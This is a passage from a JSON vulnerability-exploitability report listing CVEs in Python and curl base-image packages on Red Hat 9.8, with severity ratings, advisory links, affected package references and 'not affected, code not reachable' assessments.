          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3644",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        116
      ],
      "description": "The fix for CVE-2026-0672, which rejected control characters in http.cookies.Morsel, was incomplete. The Morsel.update(), |= operator, and unpickling paths were not patched, allowing control characters to bypass input validation. Additionally, BaseCookie.js_output() lacked the output validation applied to BaseCookie.output().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3644"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/3974092b037f9a3b000fb15b48ea61ce3b25d330"
        },
        {
          "url": "https://github.com/python/cpython/commit/556aa098e738b127c714866f819b4abe2f7593d8"
        },
        {
          "url": "https://github.com/python/cpython/commit/57e88c1cf95e1481b94ae57abe1010469d47a6b4"
        },
        {
          "url": "https://github.com/python/cpython/commit/62ceb396fcbe69da1ded3702de586f4072b590dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/d16ecc6c3626f0e2cc8f08c309c83934e8a979dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/dae4b1a21f8df4570e30986affd61bbe4ade4cef"
        },
        {
          "url": "https://github.com/python/cpython/issues/145599"
        },
        {
          "url": "https://github.com/python/cpython/pull/145600"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3644.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/H6CADMBCDRFGWCMOXWUIHFJNV43GABJ7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3644"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3644"
        }
      ],
      "published": "2026-03-16T18:16:09+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3783",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a redirect to a second URL, curl could leak that token to the second\nhostname under some circumstances.\n\nIf the hostname that the first request is redirected to has information in the\nused .netrc file, with either of the `machine` or `default` keywords, curl\nwould pass on the bearer token set for the first host also to the second one.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3783"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3783"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-8whr-249c-vfjp"
        },
        {
          "url": "https://hackerone.com/reports/3583983"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3783.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3783"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3783"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-06-17T10:44:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3784",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        305
      ],
      "description": "curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a\nserver, even if the new request uses different credentials for the HTTP proxy.\nThe proper behavior is to create or use a separate connection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3784"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3784"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5q3w-6p3j-mw6p"
        },
        {
          "url": "https://hackerone.com/reports/3584903"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3784.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3784"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
